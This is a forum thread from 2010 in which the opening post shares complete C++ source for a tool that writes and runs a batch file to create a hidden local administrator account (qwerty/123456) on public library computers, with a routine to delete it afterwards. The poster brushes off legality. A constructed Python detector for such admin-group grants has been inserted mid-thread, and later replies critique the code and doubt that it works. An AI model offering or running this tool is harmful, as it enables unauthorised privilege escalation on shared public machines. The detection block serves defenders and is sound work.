experiment

Post by Supfresh on Mon Nov 29, 2010 1:17 am

Curious to see if this will work at other places.

If you're at a public library, or in any public computer place for that matter, compile the code (C++) and drag the .exe to the desktop (of the public user account). Should create a local admin account (username: qwerty, password: 123456) without previously having admin privileges.

You can do the same thing in a batch file; this program just automates it and changes the screen resolution, since my library uses a reaaally low screen res. The code's there to change the username/password, just remove the comment tags.

As far as legality, you're on a public account in a public library, and at least at my library, there are no (at least not visible anywhere) TOC's you must agree to (most likely due to the fact that each computer has the image/registry restored on reboot and the image is stored on the server, which you don't have access to), but ymmv. Also, this isn't really a hack, more a backdoor that's been purposely left open that you've stumbled upon.

Code:
//Library Local Admin- batch file exploit
#include <iostream>
#include <string>
#include <fstream>
#include <stdlib.h>
#include <windows.h>
#include <Winuser.h>
#include <wingdi.h>

using namespace std;

void createaccount();
void deleteaccount();
int x,i; //global counter variables
int main ()
{

  begin:
  string intro;   
  intro = "0";
  cout << "***SUPFRESH***\n\n";
  cout << ("WHAT WOULD YOU LIKE TO DO? \n(1)CREATE ACCOUNT \n(2)DELETE ACCOUNT\n");
  cin >> intro;
  if (intro == "1")
     createaccount();
  else if (intro =="2")
       deleteaccount();
  else if ((intro != "1") && (intro != "2"))
  {
       cout << "INVALID INPUT\n\n";
       goto begin;
  }
  return 0;

}
void createaccount()
{
//creates and writes to the .bat file with user input
  start1:
  system("cls");
  string usrname = "qwerty";
  string psswrd = "123456";
  string ans = "Y";
 
  ofstream Adminfile;
  Adminfile.open("C:\\admin.bat",ios::out);
  //cout << "USERNAME: ";
  //cin >> usrname;
  //cout << "PASSWORD: ";
  //cin >> psswrd; 
  Adminfile << "net user " << usrname << " " << psswrd << " /add \n";
  Adminfile <<"net localgroup administrators " << usrname << " /add ";
 
  //cout << "\n\nUSERNAME: " << usrname << "\n" << "PASSWORD: " << psswrd;
  //cout << "\nCORRECT (y/n)? \n";
  //cin >> ans;
 
  if (ans == "N" | ans == "n" )
  {
     goto start1;
     }
  else
  {
       Adminfile.close();
       
       ShellExecute(NULL,"open","C:\\admin.bat", NULL,"C:\\", SW_SHOW); //creates admin account
       
             
       /****************changes display settings globally**********************************/
       DEVMODE dvmd;
       ZeroMemory(&dvmd, sizeof(dvmd));
       dvmd.dmSize = sizeof(DEVMODE);
       dvmd.dmPelsWidth = 1280 ;
       dvmd.dmFields |= DM_PELSWIDTH;
       dvmd.dmPelsHeight = 1024;
       dvmd.dmFields |= DM_PELSHEIGHT;
       dvmd.dmBitsPerPel = 32;
       dvmd.dmFields |= DM_BITSPERPEL;
       dvmd.dmDriverExtra = 0;
     
       ChangeDisplaySettingsEx(NULL,&dvmd,NULL, CDS_GLOBAL | CDS_UPDATEREGISTRY,NULL );
       /**********************************************************************************/
       
       for (i=0;i<9999;i++){
           for (x=0;x<19999;x++){}    //counter to allow time for account changes before logoff
           cout<< "...SUPFRESH...";
           }
       
       
      ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\logoff.exe", NULL,"C:\\", SW_SHOW);

       
  }
}
void deleteaccount()
{
//deletes the user created admin account and revertes display change
  start2:
  system("cls");
  string usrname = "qwerty";
  string ans ="Y";
 
  ofstream Adminfile;
  Adminfile.open("C:\\admin.bat",ios::out);
  //system("net user");
   
  //cout << "USERNAME TO DELETE: ";
  //cin >> usrname;
  //cout << "ARE YOU SURE (Y/N)? \n";
  //cin >> ans;
  if (ans == "N" | ans == "n" )
  {
     goto start2;
     }
  else
  {
       Adminfile << "net user " <<usrname<<" "<<"/delete";
       Adminfile.close();
       ShellExecute(NULL,"open","C:\\admin.bat", NULL,"C:\\", SW_SHOW);
       
       /*****************************restores display settings to default****************************/
       DEVMODE dvmd;
       ZeroMemory(&dvmd, sizeof(dvmd));
       dvmd.dmSize = sizeof(DEVMODE);
       dvmd.dmPelsWidth = 1024 ;
       dvmd.dmFields |= DM_PELSWIDTH;
       dvmd.dmPelsHeight = 768;
       dvmd.dmFields |= DM_PELSHEIGHT;
       dvmd.dmBitsPerPel = 32;
       dvmd.dmFields |= DM_BITSPERPEL;
       dvmd.dmDriverExtra = 0;
     
       ChangeDisplaySettingsEx(NULL,&dvmd,NULL, CDS_GLOBAL | CDS_UPDATEREGISTRY,NULL );
       /*********************************************************************************************/
       
       for (i=0;i<9999;i++){
           for (x=0;x<9999;x++){}    //counter to allow time for account changes before logoff
           cout<< "...SUPFRESH...";
           }
       
       ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\logoff.exe", NULL,"C:\\", SW_SHOW); //logoff
       
  }
     

}

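For whoever administers shared machines like these: the two commands the batch file above writes (`net user ... /add` followed by `net localgroup administrators ... /add`) are easy to spot in process command-line logs. The following is an added detection example, not part of the original post; the log tuple format, the sample events and the function names are constructed for illustration.

```python
# Constructed sample: (timestamp, logged-on user, command line) as a
# process-creation audit log might record them. Not taken from a real system.
SAMPLE_EVENTS = [
    ("2010-11-29T01:10:02", "public", r"cmd.exe /c C:\admin.bat"),
    ("2010-11-29T01:10:03", "public", "net user qwerty 123456 /add"),
    ("2010-11-29T01:10:03", "public", "net localgroup administrators qwerty /add"),
    ("2010-11-29T01:12:40", "public", "net user"),
    ("2010-11-29T02:00:00", "helpdesk", 'net1.exe  LOCALGROUP "Administrators" tempuser /ADD'),
    ("2010-11-29T02:05:00", "public", "net user qwerty /delete"),
]

NET_BINARIES = {"net", "net.exe", "net1", "net1.exe"}


def parse_net(cmdline):
    """Return (subcommand, positional args, switches) for a net/net1 call, else None."""
    # Whitespace split is enough here: net.exe lives in system32 (no spaces in path).
    tokens = [t.strip('"') for t in cmdline.split()]
    if len(tokens) < 2:
        return None
    exe = tokens[0].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if exe not in NET_BINARIES:
        return None
    switches = {t.lower() for t in tokens[1:] if t.startswith("/")}
    args = [t for t in tokens[1:] if not t.startswith("/")]
    return (args[0].lower(), args[1:], switches) if args else None


def find_admin_grants(events, group="administrators"):
    """Flag every /add to the admin group; 'high' if the same user also created the account."""
    created, findings = {}, []
    for ts, actor, cmdline in events:
        parsed = parse_net(cmdline)
        if not parsed or "/add" not in parsed[2]:
            continue
        sub, args, _ = parsed
        if sub == "user" and args:
            created[(actor, args[0].lower())] = ts
        elif sub == "localgroup" and len(args) >= 2 and args[0].lower() == group:
            for member in args[1:]:
                key = (actor, member.lower())
                findings.append({
                    "time": ts, "actor": actor, "account": member,
                    "created_at": created.get(key),
                    "severity": "high" if key in created else "medium",
                })
    return findings


if __name__ == "__main__":
    for finding in find_admin_grants(SAMPLE_EVENTS):
        print(finding)
```

Command-line matching misses accounts created through the API or on systems with a localized group name, so pair it with the account-management audit events (4720 and 4732 on Vista and later, 624 and 636 on XP/Server 2003).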


Re: experiment

Post by Goatboy on Mon Nov 29, 2010 1:38 am

/me shudders at excessive use of goto

So basically it's just a wrapper around a batch file...


Re: experiment

Post by Supfresh on Mon Nov 29, 2010 1:45 am

Goatboy wrote:/me shudders at excessive use of goto

So basically it's just a wrapper around a batch file...


goto is easy, and for simple programs you rarely run into problems with it, and it tends to be neater (in terms of reading the code). And yes, the purpose of the program is to make it easier/faster since I use it every time I log in. The post was more to see how often this is enabled, since it seems like a weird thing for an admin to choose to allow on their network imo, so just wondering if it's really that common.


Re: experiment

Post by sanddbox on Mon Nov 29, 2010 10:33 pm

I'm 90% sure this won't work without admin privileges. Yes, about a year before I found HTS I was one of those kids looking up teh 1337 h4x0r batch files (thank god I never found hackforums) and I recall needing administrator privileges.


Re: experiment

Post by Supfresh on Tue Nov 30, 2010 12:15 am

I don't know, I was just messing around with batch files for something else (school stuff) and found out net user worked on these computers without admin privileges, googled it, and discovered it's a pretty common "hack" on XP machines. So I'm 100% sure it does work some of the time.


Re: experiment

Post by fabianhjr on Tue Nov 30, 2010 2:56 pm

sanddbox wrote:I'm 90% sure this won't work without admin privileges. Yes, about a year before I found HTS I was one of those kids looking up teh 1337 h4x0r batch files (thank god I never found hackforums) and I recall needing administrator privileges.

I am with you on that. We need to rescue kids from that awful fate.

UAC is implemented from Vista onwards. This is supposed to be similar to a sudo. The only difference is that M$ overthought it and now you've got a system full of holes. I saw recently that a way to bypass UAC had been released; M$ is in deep problems. Other than that, you don't need C++ for a batch file! D:<


Re: experiment

Post by Supfresh on Tue Nov 30, 2010 5:55 pm

fabianhjr wrote:
sanddbox wrote:Other than that. You don't need C++ for a batch file! D:<




You can do the same thing in a batch file this program just automates it and changes the screen resolution since my library uses a reaaally low screen res
It's faster, cleaner, and you can't change resolution/freq with the standard cmd prompt cmds, as well as a few other things that I removed from the code that I posted.


Re: experiment

Post by thetan on Tue Nov 30, 2010 6:04 pm

Executing batch files from C++ is not cleaner and it's not faster. At best it's a nasty slow and inefficient hack.

For every batch script executed, a batch interpreter must be loaded into memory or forked out of memory (computationally expensive). The entire batch file must then be lexically analyzed into a token stream and then stepped through with a parsing grammar (computationally expensive and latency bound due to disk IO); then, for every program executed within that batch file, that program must be loaded into memory from disk (added latency due to disk IO), and an ~8mb stack must be allocated for that program (not a cheap operation).

also:
for (i=0;i<9999;i++){
for (x=0;x<19999;x++){} //counter to allow time for account changes before logoff
cout<< "...SUPFRESH...";
}


Create a proper timer; this is a horribly implemented time-based spin lock that wastes CPU.



Re: experiment

Post by msbachman on Tue Nov 30, 2010 6:11 pm

sanddbox wrote: (thank god I never found hackforums)


I had an account on there that I logged into today; couldn't remember much about that site, really.

Something that did intrigue me was this though:

[URL=http://imgur.com/r3kMp]
[URL=http://imgur.com/KYZ1N]


The main thing that I dislike about that site is here I might learn something from about 1/3 of the comments; there, the amount of 'trash' is unbelievable.

And then there's this piece of gold.
"I'm going to get into your sister. I'm going to get my hands on your daughter."
~Gatito


Re: experiment

Post by sanddbox on Tue Nov 30, 2010 9:35 pm

msbachman wrote:
sanddbox wrote: (thank god I never found hackforums)


I had an account on there that I logged into today; couldn't much remember much about that site, really.

Something that did intrigue me was this though:

[URL=http://imgur.com/r3kMp]
[URL=http://imgur.com/KYZ1N]


That's to be expected. What are the skids more drawn to - a huge hacking forum with plenty of viruses, tools, etc to download, or a site like this that teaches far more but has far less "become a hacker quick" type garbage?

